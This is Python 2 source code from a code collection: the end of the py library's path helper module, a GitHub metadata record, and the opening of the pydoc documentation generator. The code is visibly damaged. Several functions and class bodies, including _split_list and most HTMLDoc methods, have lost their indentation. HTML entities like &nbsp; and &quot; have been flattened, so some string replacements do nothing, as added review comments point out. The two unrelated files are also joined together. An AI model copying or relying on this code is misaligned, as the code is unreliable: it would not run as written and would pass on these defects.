        """ (deprecated) return object unpickled from self.read() """
        # NOTE(review): unpickling is unsafe on untrusted files.
        f = self.open('rb')
        try:
            return py.error.checked_call(py.std.pickle.load, f)
        finally:
            f.close()
    def move(self, target):
        """ move this path to target. """
        if target.relto(self):
            raise py.error.EINVAL(target,
                "cannot move path into a subdirectory of itself")
        try:
            self.rename(target)
        except py.error.EXDEV:  # invalid cross-device link
            # rename() cannot cross filesystems; fall back to copy+remove.
            self.copy(target)
            self.remove()
    def __repr__(self):
        """ return a string representation of this path. """
        return repr(str(self))
    def check(self, **kw):
        """ check a path for existence and properties.

        Without arguments, return True if the path exists, otherwise False.

        valid checkers::

            file=1   # is a file
            file=0   # is not a file (may not even exist)
            dir=1    # is a dir
            link=1   # is a link
            exists=1 # exists

        You can specify multiple checker definitions, for example::

            path.check(file=1, link=1)  # a link pointing to a file
        """
        if not kw:
            kw = {'exists' : 1}
        return self.Checkers(self)._evaluate(kw)
    def fnmatch(self, pattern):
        """return true if the basename/fullname matches the glob-'pattern'.

        valid pattern characters::

            *      matches everything
            ?      matches any single character
            [seq]  matches any character in seq
            [!seq] matches any char not in seq

        If the pattern contains a path-separator then the full path
        is used for pattern matching and a '*' is prepended to the
        pattern.

        if the pattern doesn't contain a path-separator the pattern
        is only matched against the basename.
        """
        return FNMatcher(pattern)(self)
    def relto(self, relpath):
        """ return a string which is the relative part of the path
        to the given 'relpath'.
        """
        if not isinstance(relpath, (str, PathBase)):
            raise TypeError("%r: not a string or path object" %(relpath,))
        strrelpath = str(relpath)
        # Normalize to a trailing separator so prefix matching is exact.
        if strrelpath and strrelpath[-1] != self.sep:
            strrelpath += self.sep
        #assert strrelpath[-1] == self.sep
        #assert strrelpath[-2] != self.sep
        strself = str(self)
        # Windows (incl. Jython on NT) compares paths case-insensitively.
        if sys.platform == "win32" or getattr(os, '_name', None) == 'nt':
            if os.path.normcase(strself).startswith(
                os.path.normcase(strrelpath)):
                return strself[len(strrelpath):]
        elif strself.startswith(strrelpath):
            return strself[len(strrelpath):]
        return ""
    def ensure_dir(self, *args):
        """ ensure the path joined with args is a directory. """
        return self.ensure(*args, **{"dir": True})
    def bestrelpath(self, dest):
        """ return a string which is a relative path from self
        (assumed to be a directory) to dest such that
        self.join(bestrelpath) == dest and if not such
        path can be determined return dest.
        """
        try:
            if self == dest:
                return os.curdir
            base = self.common(dest)
            if not base:  # can be the case on windows
                return str(dest)
            self2base = self.relto(base)
            reldest = dest.relto(base)
            if self2base:
                n = self2base.count(self.sep) + 1
            else:
                n = 0
            # Climb up from self to the common base, then descend to dest.
            l = [os.pardir] * n
            if reldest:
                l.append(reldest)
            target = dest.sep.join(l)
            return target
        except AttributeError:
            # dest lacks path methods: fall back to its string form.
            return str(dest)
    def exists(self):
        return self.check()
    def isdir(self):
        return self.check(dir=1)
    def isfile(self):
        return self.check(file=1)
    def parts(self, reverse=False):
        """ return a root-first list of all ancestor directories
        plus the path itself.
        """
        current = self
        l = [self]
        while 1:
            last = current
            current = current.dirpath()
            if last == current:
                # dirpath() of the root is the root itself: stop.
                break
            l.append(current)
        if not reverse:
            l.reverse()
        return l
    def common(self, other):
        """ return the common part shared with the other path
        or None if there is no common part.
        """
        last = None
        for x, y in zip(self.parts(), other.parts()):
            if x != y:
                return last
            last = x
        return last
    def __add__(self, other):
        """ return new path object with 'other' added to the basename"""
        return self.new(basename=self.basename+str(other))
    def __cmp__(self, other):
        """ return sort value (-1, 0, +1). """
        # Python 2 only (uses builtin cmp); __lt__ below covers py3 sorting.
        try:
            return cmp(self.strpath, other.strpath)
        except AttributeError:
            return cmp(str(self), str(other)) # self.path, other.path)
    def __lt__(self, other):
        try:
            return self.strpath < other.strpath
        except AttributeError:
            return str(self) < str(other)
    def visit(self, fil=None, rec=None, ignore=NeverRaised, bf=False, sort=False):
        """ yields all paths below the current one

        fil is a filter (glob pattern or callable), if not matching the
        path will not be yielded, defaulting to None (everything is
        returned)

        rec is a filter (glob pattern or callable) that controls whether
        a node is descended, defaulting to None

        ignore is an Exception class that is ignored when calling dirlist()
        on any of the paths (by default, all exceptions are reported)

        bf if True will cause a breadthfirst search instead of the
        default depthfirst. Default: False

        sort if True will sort entries within each directory level.
        """
        for x in Visitor(fil, rec, ignore, bf, sort).gen(self):
            yield x
    def _sortlist(self, res, sort):
        if sort:
            if hasattr(sort, '__call__'):
                # Python 2 style: a callable 'sort' is a cmp-function.
                res.sort(sort)
            else:
                res.sort()
    def samefile(self, other):
        """ return True if other refers to the same stat object as self. """
        return self.strpath == str(other)
class Visitor:
    """Implements the recursive traversal behind ``PathBase.visit``."""
    def __init__(self, fil, rec, ignore, bf, sort):
        # Glob-pattern strings become FNMatcher callables.
        if isinstance(fil, str):
            fil = FNMatcher(fil)
        if isinstance(rec, str):
            self.rec = FNMatcher(rec)
        elif not hasattr(rec, '__call__') and rec:
            # Any other truthy non-callable means "recurse everywhere".
            self.rec = lambda path: True
        else:
            self.rec = rec
        self.fil = fil
        self.ignore = ignore
        self.breadthfirst = bf
        # sorted() when sort is truthy, identity function otherwise.
        self.optsort = sort and sorted or (lambda x: x)
    def gen(self, path):
        """Recursively yield paths below *path*, honoring the filter,
        recursion predicate, traversal order and sorting options."""
        try:
            entries = path.listdir()
        except self.ignore:
            # Ignored errors silently terminate this subtree.
            return
        rec = self.rec
        dirs = self.optsort([p for p in entries
                if p.check(dir=1) and (rec is None or rec(p))])
        if not self.breadthfirst:
            # Depth-first: descend into subdirectories before yielding here.
            for subdir in dirs:
                for p in self.gen(subdir):
                    yield p
        for p in self.optsort(entries):
            if self.fil is None or self.fil(p):
                yield p
        if self.breadthfirst:
            for subdir in dirs:
                for p in self.gen(subdir):
                    yield p
class FNMatcher:
    """Callable that matches a path object against a glob *pattern*
    (see ``PathBase.fnmatch`` for the matching rules)."""
    def __init__(self, pattern):
        self.pattern = pattern
    def __call__(self, path):
        """Return True if *path* matches the stored pattern."""
        pattern = self.pattern
        if iswin32 and path.sep not in pattern and posixpath.sep in pattern:
            # Running on Windows with a pure-posix pattern: convert the
            # posix separators to the native one before matching.
            pattern = pattern.replace(posixpath.sep, path.sep)
        if path.sep not in pattern:
            # Separator-less patterns match against the basename only.
            candidate = path.basename
        else:
            candidate = str(path)  # path.strpath # XXX svn?
            if not os.path.isabs(pattern):
                # A relative pattern may match any suffix of the path.
                pattern = '*' + path.sep + pattern
        return py.std.fnmatch.fnmatch(candidate, pattern)
|
{
"content_hash": "02bb1d7a4a7672399c0e359c756709e9",
"timestamp": "",
"source": "github",
"line_count": 405,
"max_line_length": 82,
"avg_line_length": 32.306172839506175,
"alnum_prop": 0.5330174258636503,
"repo_name": "brandonium21/snowflake",
"id": "880ee79ab6b17055b35835b23f42df344bef86f5",
"size": "13084",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "snowflakeEnv/lib/python2.7/site-packages/py/_path/common.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "5939"
},
{
"name": "CSS",
"bytes": "122922"
},
{
"name": "HTML",
"bytes": "51669"
},
{
"name": "JavaScript",
"bytes": "83828"
},
{
"name": "Mako",
"bytes": "7564"
},
{
"name": "Python",
"bytes": "11152216"
},
{
"name": "Shell",
"bytes": "3809"
}
],
"symlink_target": ""
}
|
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages. Port number 0 can be
used to get an arbitrary unused port.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
https://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88564 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
    from collections import deque
except ImportError:
    # Python 2.3 compatibility
    # Minimal stand-in providing the only deque operation pydoc uses.
    class deque(list):
        def popleft(self):
            return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
    """Convert sys.path into a list of absolute, existing, unique paths."""
    result = []
    seen = []
    for entry in sys.path:
        # An empty sys.path entry means the current directory.
        path = os.path.abspath(entry or '.')
        key = os.path.normcase(path)
        if key in seen:
            continue
        if os.path.isdir(path):
            result.append(path)
            seen.append(key)
    return result
def getdoc(object):
    """Get the doc string or comments for an object."""
    text = _encode(inspect.getdoc(object) or inspect.getcomments(object))
    if not text:
        return ''
    # Drop a leading space-only line and any trailing whitespace.
    cleaned = re.sub('^ *\n', '', rstrip(text))
    return cleaned or ''
def splitdoc(doc):
    """Split a doc string into a synopsis line (if any) and the rest."""
    lines = doc.strip().split('\n')
    if len(lines) == 1:
        # Single line: it is the synopsis, there is no body.
        return lines[0], ''
    if len(lines) >= 2 and not lines[1].rstrip():
        # Blank second line separates the synopsis from the body.
        return lines[0], '\n'.join(lines[2:])
    # No separator: treat everything as body, with no synopsis.
    return '', '\n'.join(lines)
def classname(object, modname):
    """Get a class name and qualify it with a module name if necessary."""
    qualified = object.__name__
    # Only prefix the module when the class comes from somewhere else.
    if object.__module__ != modname:
        qualified = '%s.%s' % (object.__module__, qualified)
    return qualified
def isdata(object):
    """Check if an object is of a type that probably means it's data."""
    # Anything that is not a module/class/routine/frame/traceback/code
    # object is treated as plain data.
    checks = (inspect.ismodule, inspect.isclass, inspect.isroutine,
              inspect.isframe, inspect.istraceback, inspect.iscode)
    return not any(check(object) for check in checks)
def replace(text, *pairs):
    """Do a series of global replacements on a string.

    *pairs* is a flat sequence of (old, new) substrings applied in order.
    """
    while pairs:
        # Equivalent to string.join(string.split(text, old), new).
        text = pairs[1].join(text.split(pairs[0]))
        pairs = pairs[2:]
    return text
def cram(text, maxlen):
    """Omit part of a string if needed to make it fit in a maximum length."""
    if len(text) <= maxlen:
        return text
    # Keep roughly equal head and tail halves around a '...' marker.
    pre = max(0, (maxlen-3)//2)
    post = max(0, maxlen-3-pre)
    return text[:pre] + '...' + text[len(text)-post:]
# Matches the trailing " at 0x<addr>" (plus closing '>'s) that repr()
# appends to instance representations; hex digits are case-insensitive.
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
    """Remove the hexadecimal id from a Python object representation."""
    # The behaviour of %p is implementation-dependent in terms of case.
    # Keep only the captured run of '>' characters, dropping the address.
    return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
    """Return a {name: attribute} dict of all methods of *cl*, including
    those inherited from its base classes."""
    found = {}
    for key, _value in inspect.getmembers(cl, _is_some_method):
        found[key] = 1
    for base in cl.__bases__:
        found.update(allmethods(base)) # all your base are belong to us
    # Re-fetch each attribute from cl itself so derived overrides win.
    return dict((key, getattr(cl, key)) for key in found.keys())
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
    """Decide whether to show documentation on a variable."""
    # Certain special names are redundant.
    if name in ('__builtins__', '__doc__', '__file__', '__path__',
                '__module__', '__name__', '__slots__', '__package__'):
        return 0
    # Private names are hidden, but special (dunder) names are displayed.
    if name.startswith('__') and name.endswith('__'):
        return 1
    # Namedtuples have public fields and methods with a single leading underscore
    if name.startswith('_') and hasattr(obj, '_fields'):
        return 1
    if all is None:
        return not name.startswith('_')
    # only document that which the programmer exported in __all__
    return name in all
def classify_class_attrs(object):
    """Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
    def _relabel(attr):
        name, kind, cls, value = attr
        # Report all data descriptors (properties, getsets, ...) uniformly.
        if inspect.isdatadescriptor(value):
            return name, 'data descriptor', cls, value
        return name, kind, cls, value
    return map(_relabel, inspect.classify_class_attrs(object))
# ----------------------------------------------------- Unicode support helpers
try:
    _unicode = unicode
except NameError:
    # If Python is built without Unicode support, the unicode type
    # will not exist.  Fake one that nothing will match, and make
    # _encode a no-op.
    class _unicode(object):
        pass
    _encoding = 'ascii'
    def _encode(text, encoding='ascii'):
        # Nothing is ever an instance of the fake _unicode, so there is
        # never anything to encode.
        return text
else:
    import locale
    _encoding = locale.getpreferredencoding()
    def _encode(text, encoding=None):
        # Encode unicode text to a byte string, escaping characters the
        # codec cannot represent as XML character references; byte
        # strings pass through untouched.
        if isinstance(text, unicode):
            return text.encode(encoding or _encoding, 'xmlcharrefreplace')
        else:
            return text
def _binstr(obj):
    # Ensure that we have an encoded (binary) string representation of obj,
    # even if it is a unicode string.
    if isinstance(obj, _unicode):
        return obj.encode(_encoding, 'xmlcharrefreplace')
    return str(obj)
# ----------------------------------------------------- module manipulation
def ispackage(path):
    """Guess whether a path refers to a package directory."""
    if not os.path.isdir(path):
        return False
    # A directory is a package when it carries an __init__ module in any
    # source or compiled form.
    for ext in ('.py', '.pyc', '.pyo'):
        if os.path.isfile(os.path.join(path, '__init__' + ext)):
            return True
    return False
def source_synopsis(file):
    """Return the first line of the module docstring read from *file*,
    or None if no triple-quoted docstring starts near the top."""
    line = file.readline()
    # Skip over leading comment and blank lines.
    while line[:1] == '#' or not line.strip():
        line = file.readline()
        if not line:
            break
    line = line.strip()
    if line[:4] == 'r"""':
        # Treat raw docstrings like plain ones.
        line = line[1:]
    if line[:3] != '"""':
        return None
    line = line[3:]
    if line[-1:] == '\\':
        line = line[:-1]
    # Advance to the first non-blank line inside the docstring.
    while not line.strip():
        line = file.readline()
        if not line:
            break
    return line.split('"""')[0].strip()
def synopsis(filename, cache={}):
    """Get the one-line summary out of a module file."""
    # NOTE: the mutable default 'cache' is intentional -- it memoizes
    # results across calls, keyed by filename and invalidated by mtime.
    mtime = os.stat(filename).st_mtime
    lastupdate, result = cache.get(filename, (None, None))
    if lastupdate is None or lastupdate < mtime:
        info = inspect.getmoduleinfo(filename)
        try:
            file = open(filename)
        except IOError:
            # module can't be opened, so skip it
            return None
        if info and 'b' in info[2]: # binary modules have to be imported
            try: module = imp.load_module('__temp__', file, filename, info[1:])
            except: return None
            result = module.__doc__.splitlines()[0] if module.__doc__ else None
            # Remove the throwaway module so it doesn't shadow anything.
            del sys.modules['__temp__']
        else: # text modules can be directly examined
            result = source_synopsis(file)
        file.close()
        cache[filename] = (mtime, result)
    return result
class ErrorDuringImport(Exception):
    """Errors that occurred while trying to import something to document it."""
    def __init__(self, filename, exc_info):
        # Keep the (type, value, traceback) triple so callers can
        # re-raise or format the original failure.
        exc, value, tb = exc_info
        self.filename = filename
        self.exc = exc
        self.value = value
        self.tb = tb
    def __str__(self):
        exc = self.exc
        if type(exc) is types.ClassType:
            # Python 2 old-style exception class: show its bare name.
            exc = exc.__name__
        return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
    """Import a Python source file or compiled file given its path.

    Raises ErrorDuringImport (wrapping the original exc_info) if loading
    the module fails for any reason.
    """
    magic = imp.get_magic()
    # A byte-compiled file starts with the interpreter's magic number;
    # sniff the header to decide between compiled and source loading.
    file = open(path, 'r')
    try:
        if file.read(len(magic)) == magic:
            kind = imp.PY_COMPILED
        else:
            kind = imp.PY_SOURCE
    finally:
        file.close()
    filename = os.path.basename(path)
    name, ext = os.path.splitext(filename)
    file = open(path, 'r')
    # Nested try keeps Python 2.3 compatibility (no try/except/finally).
    try:
        try:
            module = imp.load_module(name, file, path, (ext, 'r', kind))
        except:
            # Wrap any failure (including SyntaxError) for uniform reporting.
            raise ErrorDuringImport(path, sys.exc_info())
    finally:
        # Close the handle even when load_module raises; previously it
        # leaked because the re-raise skipped the close() call.
        file.close()
    return module
def safeimport(path, forceload=0, cache={}):
    """Import a module; handle errors; return None if the module isn't found.

    If the module *is* found but an exception occurs, it's wrapped in an
    ErrorDuringImport exception and reraised.  Unlike __import__, if a
    package path is specified, the module at the end of the path is returned,
    not the package at the beginning.  If the optional 'forceload' argument
    is 1, we reload the module from disk (unless it's a dynamic extension)."""
    # NOTE: the mutable default 'cache' is intentional -- it pins replaced
    # modules so they aren't garbage-collected while being re-imported.
    try:
        # If forceload is 1 and the module has been previously loaded from
        # disk, we always have to reload the module.  Checking the file's
        # mtime isn't good enough (e.g. the module could contain a class
        # that inherits from another module that has changed).
        if forceload and path in sys.modules:
            if path not in sys.builtin_module_names:
                # Avoid simply calling reload() because it leaves names in
                # the currently loaded module lying around if they're not
                # defined in the new source file.  Instead, remove the
                # module from sys.modules and re-import.  Also remove any
                # submodules because they won't appear in the newly loaded
                # module's namespace if they're already in sys.modules.
                subs = [m for m in sys.modules if m.startswith(path + '.')]
                for key in [path] + subs:
                    # Prevent garbage collection.
                    cache[key] = sys.modules[key]
                    del sys.modules[key]
        module = __import__(path)
    except:
        # Did the error occur before or after the module was found?
        (exc, value, tb) = info = sys.exc_info()
        if path in sys.modules:
            # An error occurred while executing the imported module.
            raise ErrorDuringImport(sys.modules[path].__file__, info)
        elif exc is SyntaxError:
            # A SyntaxError occurred before we could execute the module.
            raise ErrorDuringImport(value.filename, info)
        elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
            # The import error occurred directly in this function,
            # which means there is no such module in the path.
            return None
        else:
            # Some other error occurred during the importing process.
            raise ErrorDuringImport(path, sys.exc_info())
    # __import__ returns the top-level package; walk down the dotted
    # components to reach the leaf module.
    for part in split(path, '.')[1:]:
        try: module = getattr(module, part)
        except AttributeError: return None
    return module
# ---------------------------------------------------- formatter base class
class Doc:
    """Base formatter: dispatches an object to the right doc* method.

    Subclasses (text/HTML) override docmodule/docclass/docroutine/etc.;
    here they all alias fail(), which raises TypeError.
    """
    def document(self, object, name=None, *args):
        """Generate documentation for an object."""
        args = (object, name) + args
        # 'try' clause is to attempt to handle the possibility that inspect
        # identifies something in a way that pydoc itself has issues handling;
        # think 'super' and how it is a descriptor (which raises the exception
        # by lacking a __name__ attribute) and an instance.
        if inspect.isgetsetdescriptor(object): return self.docdata(*args)
        if inspect.ismemberdescriptor(object): return self.docdata(*args)
        try:
            if inspect.ismodule(object): return self.docmodule(*args)
            if inspect.isclass(object): return self.docclass(*args)
            if inspect.isroutine(object): return self.docroutine(*args)
        except AttributeError:
            pass
        if isinstance(object, property): return self.docproperty(*args)
        return self.docother(*args)
    def fail(self, object, name=None, *args):
        """Raise an exception for unimplemented types."""
        message = "don't know how to document object%s of type %s" % (
            name and ' ' + repr(name), type(object).__name__)
        # Python 2 raise syntax -- this module predates Python 3.
        raise TypeError, message
    docmodule = docclass = docroutine = docother = docproperty = docdata = fail
    def getdocloc(self, object,
                  basedir=os.path.join(sys.exec_prefix, "lib",
                                       "python"+sys.version[0:3])):
        """Return the location of module docs or None"""
        try:
            file = inspect.getabsfile(object)
        except TypeError:
            file = '(built-in)'
        # PYTHONDOCS may point at a local dir or an alternative URL.
        docloc = os.environ.get("PYTHONDOCS",
                                "https://docs.python.org/library")
        basedir = os.path.normcase(basedir)
        # Only link to the Library Reference for genuine stdlib modules
        # (named core modules, or files under basedir but outside
        # site-packages), excluding a couple of known special cases.
        if (isinstance(object, type(os)) and
            (object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
                                 'marshal', 'posix', 'signal', 'sys',
                                 'thread', 'zipimport') or
             (file.startswith(basedir) and
              not file.startswith(os.path.join(basedir, 'site-packages')))) and
            object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
            if docloc.startswith(("http://", "https://")):
                docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__.lower())
            else:
                docloc = os.path.join(docloc, object.__name__.lower() + ".html")
        else:
            docloc = None
        return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
    """Class for safely making an HTML representation of a Python object."""
    def __init__(self):
        Repr.__init__(self)
        # Truncation limits for the various container/scalar reprs.
        self.maxlist = self.maxtuple = 20
        self.maxdict = 10
        self.maxstring = self.maxother = 100
    def escape(self, text):
        """HTML-escape &, < and > in text."""
        # BUG FIX: the replacement pairs had collapsed to identity
        # ('&'->'&', '<'->'<', '>'->'>'), making escaping a no-op;
        # restore the proper HTML entities.
        return replace(text, '&', '&amp;', '<', '&lt;', '>', '&gt;')
    def repr(self, object):
        return Repr.repr(self, object)
    def repr1(self, x, level):
        # Dispatch to a type-specific repr_<typename> method if one exists.
        if hasattr(type(x), '__name__'):
            methodname = 'repr_' + join(split(type(x).__name__), '_')
            if hasattr(self, methodname):
                return getattr(self, methodname)(x, level)
        return self.escape(cram(stripid(repr(x)), self.maxother))
    def repr_string(self, x, level):
        test = cram(x, self.maxstring)
        testrepr = repr(test)
        if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
            # Backslashes are only literal in the string and are never
            # needed to make any special characters, so show a raw string.
            return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
        # Highlight escape sequences in magenta.
        return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
                      r'<font color="#c040c0">\1</font>',
                      self.escape(testrepr))
    repr_str = repr_string
    def repr_instance(self, x, level):
        try:
            return self.escape(cram(stripid(repr(x)), self.maxstring))
        except:
            # repr() itself can raise for broken objects; show a placeholder.
            return self.escape('<%s instance>' % x.__class__.__name__)
    repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return _encode('''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
<meta charset="utf-8">
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents), 'ascii')
    def heading(self, title, fgcol, bgcol, extras=''):
        """Format a page heading."""
        # NOTE(review): the bare ' ' strings in this template look like
        # '&nbsp;' entities unescaped by a conversion step -- confirm
        # against the upstream source before changing.
        return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')

    def section(self, title, fgcol, bgcol, contents, width=6,
                prelude='', marginalia=None, gap=' '):
        """Format a section with a heading."""
        if marginalia is None:
            marginalia = '<tt>' + ' ' * width + '</tt>'
        result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
        # With a prelude the marginalia cell spans two rows; otherwise a
        # single row holds marginalia, gap and contents.
        if prelude:
            result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
        else:
            result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
        return result + '\n<td width="100%%">%s</td></tr></table>' % contents
    def bigsection(self, title, *args):
        """Format a section with a big heading."""
        title = '<big><strong>%s</strong></big>' % title
        return self.section(title, *args)

    def preformat(self, text):
        """Format literal preformatted text."""
        text = self.escape(expandtabs(text))
        # NOTE(review): the ' ' replacement strings below look like
        # '&nbsp;' entities unescaped by a conversion step -- confirm
        # against the upstream source before changing.
        return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
                       ' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
    def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
        """Mark up some plain text, given a context of symbols to look for.
        Each context dictionary maps object names to anchor names."""
        escape = escape or self.escape
        results = []
        here = 0
        # One alternation recognizes URLs, RFC/PEP references,
        # 'self.name' references and bare identifiers; scanned
        # left-to-right, non-matching text is escaped verbatim.
        pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
                                r'RFC[- ]?(\d+)|'
                                r'PEP[- ]?(\d+)|'
                                r'(self\.)?(\w+))')
        while True:
            match = pattern.search(text, here)
            if not match: break
            start, end = match.span()
            results.append(escape(text[here:start]))
            all, scheme, rfc, pep, selfdot, name = match.groups()
            if scheme:
                # NOTE(review): replacing '"' with '"' is a no-op; upstream
                # pydoc replaces it with '&quot;' -- this looks like an
                # entity unescaped by a conversion step; confirm.
                url = escape(all).replace('"', '"')
                results.append('<a href="%s">%s</a>' % (url, url))
            elif rfc:
                url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
                results.append('<a href="%s">%s</a>' % (url, escape(all)))
            elif pep:
                url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
                results.append('<a href="%s">%s</a>' % (url, escape(all)))
            elif selfdot:
                # Create a link for methods like 'self.method(...)'
                # and use <strong> for attributes like 'self.attr'
                if text[end:end+1] == '(':
                    results.append('self.' + self.namelink(name, methods))
                else:
                    results.append('self.<strong>%s</strong>' % name)
            elif text[end:end+1] == '(':
                results.append(self.namelink(name, methods, funcs, classes))
            else:
                results.append(self.namelink(name, classes))
            here = end
        results.append(escape(text[here:]))
        return join(results, '')
# ---------------------------------------------- type-specific routines
    def formattree(self, tree, modname, parent=None):
        """Produce HTML for a class tree as given by inspect.getclasstree()."""
        result = ''
        for entry in tree:
            if type(entry) is type(()):
                # (class, bases) tuple: emit the class plus its base list.
                c, bases = entry
                result = result + '<dt><font face="helvetica, arial">'
                result = result + self.classlink(c, modname)
                if bases and bases != (parent,):
                    parents = []
                    for base in bases:
                        parents.append(self.classlink(base, modname))
                    result = result + '(' + join(parents, ', ') + ')'
                result = result + '\n</font></dt>'
            elif type(entry) is type([]):
                # Nested list: subclasses of the class 'c' emitted just above.
                result = result + '<dd>\n%s</dd>\n' % self.formattree(
                    entry, modname, c)
        return '<dl>\n%s</dl>\n' % result
    def docmodule(self, object, name=None, mod=None, *ignored):
        """Produce HTML documentation for a module object."""
        name = object.__name__ # ignore the passed-in name
        try:
            all = object.__all__
        except AttributeError:
            all = None
        # Build a breadcrumb-style linked dotted name for the heading.
        parts = split(name, '.')
        links = []
        for i in range(len(parts)-1):
            links.append(
                '<a href="%s.html"><font color="#ffffff">%s</font></a>' %
                (join(parts[:i+1], '.'), parts[i]))
        linkedname = join(links + parts[-1:], '.')
        head = '<big><big><strong>%s</strong></big></big>' % linkedname
        try:
            path = inspect.getabsfile(object)
            url = path
            if sys.platform == 'win32':
                import nturl2path
                url = nturl2path.pathname2url(path)
            filelink = '<a href="file:%s">%s</a>' % (url, path)
        except TypeError:
            filelink = '(built-in)'
        info = []
        if hasattr(object, '__version__'):
            version = _binstr(object.__version__)
            # Strip CVS-style '$Revision: ... $' markers down to the number.
            if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
                version = strip(version[11:-1])
            info.append('version %s' % self.escape(version))
        if hasattr(object, '__date__'):
            info.append(self.escape(_binstr(object.__date__)))
        if info:
            head = head + ' (%s)' % join(info, ', ')
        docloc = self.getdocloc(object)
        if docloc is not None:
            docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
        else:
            docloc = ''
        result = self.heading(
            head, '#ffffff', '#7799ee',
            '<a href=".">index</a><br>' + filelink + docloc)
        modules = inspect.getmembers(object, inspect.ismodule)
        classes, cdict = [], {}
